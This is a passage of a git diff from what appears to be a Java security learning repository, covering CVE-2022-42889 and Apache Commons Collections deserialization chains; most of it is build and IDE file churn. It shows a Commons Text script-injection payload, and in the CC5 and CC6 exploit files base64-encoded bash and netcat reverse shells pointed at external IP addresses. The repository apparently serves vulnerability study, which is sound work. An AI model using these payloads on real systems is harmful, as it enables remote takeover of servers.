 
 StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
 String payload = "${script:javascript:new java.lang.ProcessBuilder(\"calc\").start()}";
- interpolator.replace(payload);
+ String result = interpolator.replace(payload);
+ System.out.println(result);
 }
 }
\ No newline at end of file
diff --git a/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/src/main/java/Vul.java b/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/src/main/java/Vul.java
new file mode 100644
index 00000000..e0b6782d
--- /dev/null
+++ b/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/src/main/java/Vul.java	
@@ -0,0 +1,15 @@
+import org.apache.commons.text.StringSubstitutor;
+
+import java.util.Scanner;
+
+public class Vul {
+ public static void main(String[] args) {
+
+ Scanner scanner = new Scanner(System.in);
+ String userInput = scanner.nextLine();
+ StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
+ String result = interpolator.replace(userInput);
+ scanner.close();
+ System.out.println(result);
+ }
+}
diff --git a/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/CVE-2022-42889-1.0-SNAPSHOT.jar b/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/CVE-2022-42889-1.0-SNAPSHOT.jar
new file mode 100644
index 00000000..b07ea110
Binary files /dev/null and b/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/CVE-2022-42889-1.0-SNAPSHOT.jar differ
diff --git a/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/classes/EXP.class b/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/classes/EXP.class
new file mode 100644
index 00000000..d3f30c89
Binary files /dev/null and b/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/classes/EXP.class differ
diff --git a/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/classes/META-INF/maven/archetype.xml b/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/classes/META-INF/maven/archetype.xml
new file mode 100644
index 00000000..40dabe45
--- /dev/null
+++ b/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/classes/META-INF/maven/archetype.xml	
@@ -0,0 +1,9 @@
+<archetype>
+ <id>CVE-2022-42889</id>
+ <sources>
+ <source>src/main/java/App.java</source>
+ </sources>
+ <testsources>
+ <source>src/test/java/AppTest.java</source>
+ </testsources>
+</archetype>
diff --git a/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/classes/Vul.class b/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/classes/Vul.class
new file mode 100644
index 00000000..d4a9d7b3
Binary files /dev/null and b/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/classes/Vul.class differ
diff --git a/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/classes/archetype-resources/pom.xml b/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/classes/archetype-resources/pom.xml
new file mode 100644
index 00000000..b38429db
--- /dev/null
+++ b/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/classes/archetype-resources/pom.xml	
@@ -0,0 +1,15 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>$org.example</groupid>
+ <artifactid>$CVE-2022-42889</artifactid>
+ <version>1ドル.0-SNAPSHOT</version>
+ <dependencies>
+ <dependency>
+ <groupid>junit</groupid>
+ <artifactid>junit</artifactid>
+ <version>3.8.1</version>
+ <scope>test</scope>
+ </dependency>
+ </dependencies>
+</project>
diff --git a/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/classes/archetype-resources/src/main/java/App.java b/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/classes/archetype-resources/src/main/java/App.java
new file mode 100644
index 00000000..1fa6a956
--- /dev/null
+++ b/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/classes/archetype-resources/src/main/java/App.java	
@@ -0,0 +1,13 @@
+package $org.example;
+
+/**
+ * Hello world!
+ *
+ */
+public class App 
+{
+ public static void main( String[] args )
+ {
+ System.out.println( "Hello World!" );
+ }
+}
diff --git a/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/classes/archetype-resources/src/test/java/AppTest.java b/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/classes/archetype-resources/src/test/java/AppTest.java
new file mode 100644
index 00000000..65be417e
--- /dev/null
+++ b/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/classes/archetype-resources/src/test/java/AppTest.java	
@@ -0,0 +1,38 @@
+package $org.example;
+
+import junit.framework.Test;
+import junit.framework.TestCase;
+import junit.framework.TestSuite;
+
+/**
+ * Unit test for simple App.
+ */
+public class AppTest 
+ extends TestCase
+{
+ /**
+ * Create the test case
+ *
+ * @param testName name of the test case
+ */
+ public AppTest( String testName )
+ {
+ super( testName );
+ }
+
+ /**
+ * @return the suite of tests being tested
+ */
+ public static Test suite()
+ {
+ return new TestSuite( AppTest.class );
+ }
+
+ /**
+ * Rigourous Test :-)
+ */
+ public void testApp()
+ {
+ assertTrue( true );
+ }
+}
diff --git a/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/maven-archiver/pom.properties b/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/maven-archiver/pom.properties
new file mode 100644
index 00000000..b34d28d8
--- /dev/null
+++ b/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/maven-archiver/pom.properties	
@@ -0,0 +1,5 @@
+#Generated by Maven
+#Fri Jan 05 10:24:08 CST 2024
+version=1.0-SNAPSHOT
+groupId=org.example
+artifactId=CVE-2022-42889
diff --git a/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst b/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst
new file mode 100644
index 00000000..863531d2
--- /dev/null
+++ b/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst	
@@ -0,0 +1,2 @@
+Vul.class
+EXP.class
diff --git a/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst b/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst
new file mode 100644
index 00000000..a1cba735
--- /dev/null
+++ b/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst	
@@ -0,0 +1,2 @@
+E:\Coding\Java\JavaSecurityLearning\JavaSecurity\Apache\Apache Commons Text\CVE-2022-42889\src\main\java\EXP.java
+E:\Coding\Java\JavaSecurityLearning\JavaSecurity\Apache\Apache Commons Text\CVE-2022-42889\src\main\java\Vul.java
diff --git a/JavaSecurity/Apache/CC/CC5/CC5.iml b/JavaSecurity/Apache/CC/CC5/CC5.iml
new file mode 100644
index 00000000..abe781f7
--- /dev/null
+++ b/JavaSecurity/Apache/CC/CC5/CC5.iml
@@ -0,0 +1,8 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module version="4">
+ <component name="AdditionalModuleElements">
+ <content url="file://$MODULE_DIR$" dumb="true">
+ <sourcefolder url="file://$MODULE_DIR$/src" isTestSource="false" />
+ </content>
+ </component>
+</module>
\ No newline at end of file
diff --git a/JavaSecurity/Apache/CC/CC5/ser.bin b/JavaSecurity/Apache/CC/CC5/ser.bin
index 568fb87d..3c1e9909 100644
Binary files a/JavaSecurity/Apache/CC/CC5/ser.bin and b/JavaSecurity/Apache/CC/CC5/ser.bin differ
diff --git a/JavaSecurity/Apache/CC/CC5/src/CC5EXP/CC5EXP.java b/JavaSecurity/Apache/CC/CC5/src/CC5EXP/CC5EXP.java
index 83de30b2..13cb3e64 100644
--- a/JavaSecurity/Apache/CC/CC5/src/CC5EXP/CC5EXP.java
+++ b/JavaSecurity/Apache/CC/CC5/src/CC5EXP/CC5EXP.java
@@ -22,7 +22,7 @@ public static void main(String[] args) throws Exception{
 new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
 new InvokerTransformer("invoke"
 , new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
- new InvokerTransformer("exec", new Class[]{String.class}, new String[]{"\"/bin/bash\", \"-c\", \"{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84MS42OC4xMjAuMTQvMjMzNCAwPiYx}&#124;{base64,-d}&#124;{bash,-i}\"}"})
+ new InvokerTransformer("exec", new Class[]{String.class}, new String[]{"\"/bin/bash\", \"-c\", \"{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjIxLjEzOC8yMzM0IDA+JjE=}&#124;{base64,-d}&#124;{bash,-i}\"}"})
 };
 ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
 HashMap hashMap = new HashMap<strong>();
diff --git a/JavaSecurity/Apache/CC/CC5/target/classes/CC5EXP/CC5EXP.class b/JavaSecurity/Apache/CC/CC5/target/classes/CC5EXP/CC5EXP.class
index 689d1ee5..5b6f9ec2 100644
Binary files a/JavaSecurity/Apache/CC/CC5/target/classes/CC5EXP/CC5EXP.class and b/JavaSecurity/Apache/CC/CC5/target/classes/CC5EXP/CC5EXP.class differ
diff --git a/JavaSecurity/Apache/CC/CC5/target/classes/CC5EXP/Test.class b/JavaSecurity/Apache/CC/CC5/target/classes/CC5EXP/Test.class
index 1e1a1cf6..edf42b30 100644
Binary files a/JavaSecurity/Apache/CC/CC5/target/classes/CC5EXP/Test.class and b/JavaSecurity/Apache/CC/CC5/target/classes/CC5EXP/Test.class differ
diff --git a/JavaSecurity/Apache/CC/CC6/CC6.iml b/JavaSecurity/Apache/CC/CC6/CC6.iml
new file mode 100644
index 00000000..abe781f7
--- /dev/null
+++ b/JavaSecurity/Apache/CC/CC6/CC6.iml
@@ -0,0 +1,8 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module version="4">
+ <component name="AdditionalModuleElements">
+ <content url="file://$MODULE_DIR$" dumb="true">
+ <sourcefolder url="file://$MODULE_DIR$/src" isTestSource="false" />
+ </content>
+ </component>
+</module>
\ No newline at end of file
diff --git a/JavaSecurity/Apache/CC/CC6/ser.bin b/JavaSecurity/Apache/CC/CC6/ser.bin
index bbdc43ec..b79119e9 100644
Binary files a/JavaSecurity/Apache/CC/CC6/ser.bin and b/JavaSecurity/Apache/CC/CC6/ser.bin differ
diff --git a/JavaSecurity/Apache/CC/CC6/src/CC6ysoEXP/FinalCC6EXP.java b/JavaSecurity/Apache/CC/CC6/src/CC6ysoEXP/FinalCC6EXP.java
index 09d41ddb..df74a987 100644
--- a/JavaSecurity/Apache/CC/CC6/src/CC6ysoEXP/FinalCC6EXP.java
+++ b/JavaSecurity/Apache/CC/CC6/src/CC6ysoEXP/FinalCC6EXP.java
@@ -1,3 +1,5 @@
+package CC6ysoEXP;
+
 import org.apache.commons.collections.Transformer;
 import org.apache.commons.collections.functors.ChainedTransformer;
 import org.apache.commons.collections.functors.ConstantTransformer;
@@ -13,7 +15,7 @@
 // CC6 链最终 EXP
 public class FinalCC6EXP {
 public static void main(String[] args) throws Exception{
- String[] cmd = {"nc 81.68.120.14 9990 -e /bin/bash"};
+ String[] cmd = {"\"/bin/bash\", \"-c\", \"{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjIxLjEzOC8yMzM0IDA+JjE=}&#124;{base64,-d}&#124;{bash,-i}\"}"};
 Transformer[] transformers = new Transformer[]{
 new ConstantTransformer(Runtime.class),
 new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
diff --git a/JavaSecurity/Apache/CC/CC6/target/classes/CC6ysoEXP/FinalCC6EXP.class b/JavaSecurity/Apache/CC/CC6/target/classes/CC6ysoEXP/FinalCC6EXP.class
new file mode 100644
index 00000000..7a0e296b
Binary files /dev/null and b/JavaSecurity/Apache/CC/CC6/target/classes/CC6ysoEXP/FinalCC6EXP.class differ
diff --git a/JavaSecurity/Apache/CC/CC6/target/classes/FinalCC6EXP.class b/JavaSecurity/Apache/CC/CC6/target/classes/FinalCC6EXP.class
deleted file mode 100644
index 2b873d2c..00000000
Binary files a/JavaSecurity/Apache/CC/CC6/target/classes/FinalCC6EXP.class and /dev/null differ
diff --git a/JavaSecurity/Apache/CC/CC6/target/classes/Hello.class b/JavaSecurity/Apache/CC/CC6/target/classes/Hello.class
deleted file mode 100644
index 0a1cc4e1..00000000
Binary files a/JavaSecurity/Apache/CC/CC6/target/classes/Hello.class and /dev/null differ
diff --git a/JavaSecurity/Apache/Shiro/CVE-2010-3863/src/main/resources/application.yml b/JavaSecurity/Apache/Shiro/CVE-2010-3863/src/main/resources/application.yml
index 017551aa..c54acdac 100644
--- a/JavaSecurity/Apache/Shiro/CVE-2010-3863/src/main/resources/application.yml
+++ b/JavaSecurity/Apache/Shiro/CVE-2010-3863/src/main/resources/application.yml
@@ -3,7 +3,7 @@ spring:
 username: drunkbaby
 password: drunkbaby
 #?serverTimezone=UTC解决时区的报错
- url: jdbc:mysql://localhost/mybatis?serverTimezone=UTC&useUnicode=true&characterEncoding=utf-8
+ url: jdbc:mysql://localhost:3306/mybatis?serverTimezone=UTC&useUnicode=true&characterEncoding=utf-8
 driver-class-name: com.mysql.cj.jdbc.Driver
 type: com.alibaba.druid.pool.DruidDataSource
 
diff --git a/JavaSecurity/Apache/Shiro/CVE-2010-3863/target/classes/application.yml b/JavaSecurity/Apache/Shiro/CVE-2010-3863/target/classes/application.yml
index 017551aa..c54acdac 100644
--- a/JavaSecurity/Apache/Shiro/CVE-2010-3863/target/classes/application.yml
+++ b/JavaSecurity/Apache/Shiro/CVE-2010-3863/target/classes/application.yml
@@ -3,7 +3,7 @@ spring:
 username: drunkbaby
 password: drunkbaby
 #?serverTimezone=UTC解决时区的报错
- url: jdbc:mysql://localhost/mybatis?serverTimezone=UTC&useUnicode=true&characterEncoding=utf-8
+ url: jdbc:mysql://localhost:3306/mybatis?serverTimezone=UTC&useUnicode=true&characterEncoding=utf-8
 driver-class-name: com.mysql.cj.jdbc.Driver
 type: com.alibaba.druid.pool.DruidDataSource
 
diff --git a/JavaSecurity/Apache/Shiro/shiro/src/main/java/shiro/config/UserRealm.java b/JavaSecurity/Apache/Shiro/shiro/src/main/java/shiro/config/UserRealm.java
index 26102ef1..97c0af3e 100644
--- a/JavaSecurity/Apache/Shiro/shiro/src/main/java/shiro/config/UserRealm.java
+++ b/JavaSecurity/Apache/Shiro/shiro/src/main/java/shiro/config/UserRealm.java
@@ -13,6 +13,7 @@
 import shiro.service.UserServiceImpl;
 
 // 自定义的 Realm
+
 public class UserRealm extends AuthorizingRealm {
 
 @Autowired
diff --git a/JavaSecurity/Apache/Shiro/shiro/src/main/resources/application.yml b/JavaSecurity/Apache/Shiro/shiro/src/main/resources/application.yml
index c6550fa1..4f9c074d 100644
--- a/JavaSecurity/Apache/Shiro/shiro/src/main/resources/application.yml
+++ b/JavaSecurity/Apache/Shiro/shiro/src/main/resources/application.yml
@@ -32,3 +32,5 @@ spring:
 mybatis:
 type-aliases-package: shiro.pojo
 mapper-locations: classpath:mapper/*.xml
+server:
+ port: 8082
diff --git a/JavaSecurity/Apache/Shiro/shiro/target/classes/application.yml b/JavaSecurity/Apache/Shiro/shiro/target/classes/application.yml
index c6550fa1..4f9c074d 100644
--- a/JavaSecurity/Apache/Shiro/shiro/target/classes/application.yml
+++ b/JavaSecurity/Apache/Shiro/shiro/target/classes/application.yml
@@ -32,3 +32,5 @@ spring:
 mybatis:
 type-aliases-package: shiro.pojo
 mapper-locations: classpath:mapper/*.xml
+server:
+ port: 8082
diff --git a/JavaSecurity/Apache/Shiro/shiro/target/classes/shiro/config/UserRealm.class b/JavaSecurity/Apache/Shiro/shiro/target/classes/shiro/config/UserRealm.class
index e4497513..62c49c33 100644
Binary files a/JavaSecurity/Apache/Shiro/shiro/target/classes/shiro/config/UserRealm.class and b/JavaSecurity/Apache/Shiro/shiro/target/classes/shiro/config/UserRealm.class differ
diff --git a/JavaSecurity/C3P0/C3P0Vuls/C3P0Vuls.iml b/JavaSecurity/C3P0/C3P0Vuls/C3P0Vuls.iml
new file mode 100644
index 00000000..056f8821
--- /dev/null
+++ b/JavaSecurity/C3P0/C3P0Vuls/C3P0Vuls.iml
@@ -0,0 +1,8 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module version="4">
+ <component name="AdditionalModuleElements">
+ <content url="file://$MODULE_DIR$" dumb="true">
+ <sourcefolder url="file://$MODULE_DIR$/src/main/java" isTestSource="false" />
+ </content>
+ </component>
+</module>
\ No newline at end of file
diff --git a/JavaSecurity/C3P0/C3P0Vuls/target/classes/JNDIVul/JndiForwardingDataSourceEXP.class b/JavaSecurity/C3P0/C3P0Vuls/target/classes/JNDIVul/JndiForwardingDataSourceEXP.class
new file mode 100644
index 00000000..36134d3f
Binary files /dev/null and b/JavaSecurity/C3P0/C3P0Vuls/target/classes/JNDIVul/JndiForwardingDataSourceEXP.class differ
diff --git a/JavaSecurity/C3P0/C3P0Vuls/target/classes/JNDIVul/JndiRefConnectionPoolDataSourceEXP.class b/JavaSecurity/C3P0/C3P0Vuls/target/classes/JNDIVul/JndiRefConnectionPoolDataSourceEXP.class
new file mode 100644
index 00000000..7eae5ffa
Binary files /dev/null and b/JavaSecurity/C3P0/C3P0Vuls/target/classes/JNDIVul/JndiRefConnectionPoolDataSourceEXP.class differ
diff --git a/JavaSecurity/C3P0/C3P0Vuls/target/classes/JNDIVul/JndiRefConnectionPoolDataSourceTest.class b/JavaSecurity/C3P0/C3P0Vuls/target/classes/JNDIVul/JndiRefConnectionPoolDataSourceTest.class
new file mode 100644
index 00000000..17a51e1a
Binary files /dev/null and b/JavaSecurity/C3P0/C3P0Vuls/target/classes/JNDIVul/JndiRefConnectionPoolDataSourceTest.class differ
diff --git a/JavaSecurity/C3P0/C3P0Vuls/target/classes/NoNetUsing/NoAccessEXP$Loader_Ref.class b/JavaSecurity/C3P0/C3P0Vuls/target/classes/NoNetUsing/NoAccessEXP$Loader_Ref.class
new file mode 100644
index 00000000..21c443c0
Binary files /dev/null and b/JavaSecurity/C3P0/C3P0Vuls/target/classes/NoNetUsing/NoAccessEXP$Loader_Ref.class differ
diff --git a/JavaSecurity/C3P0/C3P0Vuls/target/classes/NoNetUsing/NoAccessEXP.class b/JavaSecurity/C3P0/C3P0Vuls/target/classes/NoNetUsing/NoAccessEXP.class
new file mode 100644
index 00000000..144d690d
Binary files /dev/null and b/JavaSecurity/C3P0/C3P0Vuls/target/classes/NoNetUsing/NoAccessEXP.class differ
diff --git a/JavaSecurity/C3P0/C3P0Vuls/target/classes/Test.class b/JavaSecurity/C3P0/C3P0Vuls/target/classes/Test.class
new file mode 100644
index 00000000..dff1a7cb
Binary files /dev/null and b/JavaSecurity/C3P0/C3P0Vuls/target/classes/Test.class differ
diff --git a/JavaSecurity/C3P0/C3P0Vuls/target/classes/URLClassLoader/BasicURLClassLoader.class b/JavaSecurity/C3P0/C3P0Vuls/target/classes/URLClassLoader/BasicURLClassLoader.class
new file mode 100644
index 00000000..7b3d892e
Binary files /dev/null and b/JavaSecurity/C3P0/C3P0Vuls/target/classes/URLClassLoader/BasicURLClassLoader.class differ
diff --git a/JavaSecurity/C3P0/C3P0Vuls/target/classes/URLClassLoader/RefToURLClassLoader.class b/JavaSecurity/C3P0/C3P0Vuls/target/classes/URLClassLoader/RefToURLClassLoader.class
new file mode 100644
index 00000000..94329d66
Binary files /dev/null and b/JavaSecurity/C3P0/C3P0Vuls/target/classes/URLClassLoader/RefToURLClassLoader.class differ
diff --git a/JavaSecurity/C3P0/C3P0Vuls/target/classes/URLClassLoader/URLClassLoaderEXP$EXP_Loader.class b/JavaSecurity/C3P0/C3P0Vuls/target/classes/URLClassLoader/URLClassLoaderEXP$EXP_Loader.class
new file mode 100644
index 00000000..c8ed0cbf
Binary files /dev/null and b/JavaSecurity/C3P0/C3P0Vuls/target/classes/URLClassLoader/URLClassLoaderEXP$EXP_Loader.class differ
diff --git a/JavaSecurity/C3P0/C3P0Vuls/target/classes/URLClassLoader/URLClassLoaderEXP.class b/JavaSecurity/C3P0/C3P0Vuls/target/classes/URLClassLoader/URLClassLoaderEXP.class
new file mode 100644
index 00000000..6d834a22
Binary files /dev/null and b/JavaSecurity/C3P0/C3P0Vuls/target/classes/URLClassLoader/URLClassLoaderEXP.class differ
diff --git a/JavaSecurity/C3P0/C3P0Vuls/target/classes/hexBase/HexBaseFastjsonEXP.class b/JavaSecurity/C3P0/C3P0Vuls/target/classes/hexBase/HexBaseFastjsonEXP.class
new file mode 100644
index 00000000..68bb48e1
Binary files /dev/null and b/JavaSecurity/C3P0/C3P0Vuls/target/classes/hexBase/HexBaseFastjsonEXP.class differ
diff --git a/JavaSecurity/C3P0/C3P0Vuls/target/classes/hexBase/HexBaseNewEXP.class b/JavaSecurity/C3P0/C3P0Vuls/target/classes/hexBase/HexBaseNewEXP.class
new file mode 100644
index 00000000..a298fb3b
Binary files /dev/null and b/JavaSecurity/C3P0/C3P0Vuls/target/classes/hexBase/HexBaseNewEXP.class differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/CC/CC.iml b/JavaSecurity/CodeReview/JavaSec-Code/CC/CC.iml
new file mode 100644
index 00000000..6ff5bbaa
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/CC/CC.iml
@@ -0,0 +1,96 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module org.jetbrains.idea.maven.project.MavenProjectsManager.isMavenModule="true" type="JAVA_MODULE" version="4">
+ <component name="FacetManager">
+ <facet type="web" name="Web">
+ <configuration>
+ <webroots />
+ <sourceroots>
+ <root url="file://$MODULE_DIR$/src/main/java" />
+ <root url="file://$MODULE_DIR$/src/main/resources" />
+ </sourceroots>
+ </configuration>
+ </facet>
+ <facet type="Spring" name="Spring">
+ <configuration />
+ </facet>
+ </component>
+ <component name="NewModuleRootManager" LANGUAGE_LEVEL="JDK_1_8">
+ <output url="file://$MODULE_DIR$/target/classes" />
+ <output-test url="file://$MODULE_DIR$/target/test-classes" />
+ <content url="file://$MODULE_DIR$">
+ <sourcefolder url="file://$MODULE_DIR$/src/main/java" isTestSource="false" />
+ <sourcefolder url="file://$MODULE_DIR$/src/main/resources" type="java-resource" />
+ <sourcefolder url="file://$MODULE_DIR$/src/test/java" isTestSource="true" />
+ <excludefolder url="file://$MODULE_DIR$/target" />
+ </content>
+ <orderentry type="jdk" jdkName="1.8 (2)" jdkType="JavaSDK" />
+ <orderentry type="sourceFolder" forTests="false" />
+ <orderentry type="library" name="Maven: org.apache.commons:commons-collections4:4.0" level="project" />
+ <orderentry type="library" name="Maven: org.javassist:javassist:3.27.0-GA" level="project" />
+ <orderentry type="library" name="Maven: org.jboss.classpool:jboss-classpool:1.0.0.GA" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-web:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-autoconfigure:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-logging:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: ch.qos.logback:logback-classic:1.2.11" level="project" />
+ <orderentry type="library" name="Maven: ch.qos.logback:logback-core:1.2.11" level="project" />
+ <orderentry type="library" name="Maven: org.apache.logging.log4j:log4j-to-slf4j:2.17.2" level="project" />
+ <orderentry type="library" name="Maven: org.slf4j:jul-to-slf4j:1.7.36" level="project" />
+ <orderentry type="library" name="Maven: jakarta.annotation:jakarta.annotation-api:1.3.5" level="project" />
+ <orderentry type="library" name="Maven: org.yaml:snakeyaml:1.30" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-json:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.core:jackson-databind:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.core:jackson-annotations:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.core:jackson-core:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.datatype:jackson-datatype-jdk8:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.datatype:jackson-datatype-jsr310:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.module:jackson-module-parameter-names:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-tomcat:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-core:9.0.65" level="project" />
+ <orderentry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-el:9.0.65" level="project" />
+ <orderentry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-websocket:9.0.65" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-web:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-beans:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-webmvc:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-aop:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-context:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-expression:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.projectlombok:lombok:1.18.24" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework.boot:spring-boot-starter-test:2.7.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework.boot:spring-boot-test:2.7.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework.boot:spring-boot-test-autoconfigure:2.7.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: com.jayway.jsonpath:json-path:2.7.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.minidev:json-smart:2.4.8" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.minidev:accessors-smart:2.4.8" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.ow2.asm:asm:9.1" level="project" />
+ <orderentry type="library" name="Maven: org.slf4j:slf4j-api:1.7.36" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: jakarta.xml.bind:jakarta.xml.bind-api:2.3.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: jakarta.activation:jakarta.activation-api:1.2.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.assertj:assertj-core:3.22.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.hamcrest:hamcrest:2.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter-api:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.opentest4j:opentest4j:1.2.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.platform:junit-platform-commons:1.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.apiguardian:apiguardian-api:1.1.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter-params:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter-engine:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.platform:junit-platform-engine:1.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.mockito:mockito-core:4.5.1" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.bytebuddy:byte-buddy:1.12.13" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.bytebuddy:byte-buddy-agent:1.12.13" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.objenesis:objenesis:3.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.mockito:mockito-junit-jupiter:4.5.1" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.skyscreamer:jsonassert:1.5.1" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: com.vaadin.external.google:android-json:0.0.20131108.vaadin1" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-core:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-jcl:5.3.22" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework:spring-test:5.3.22" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.xmlunit:xmlunit-core:2.9.0" level="project" />
+ <orderentry type="library" name="Maven: mysql:mysql-connector-java:8.0.12" level="project" />
+ <orderentry type="library" name="Maven: org.apache.logging.log4j:log4j-core:2.9.1" level="project" />
+ <orderentry type="library" name="Maven: org.apache.logging.log4j:log4j-api:2.9.1" level="project" />
+ <orderentry type="library" name="Maven: commons-collections:commons-collections:3.2.1" level="project" />
+ </component>
+</module>
\ No newline at end of file
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/CC/target/classes/application.properties b/JavaSecurity/CodeReview/JavaSec-Code/CC/target/classes/application.properties
new file mode 100644
index 00000000..bafddced
--- /dev/null
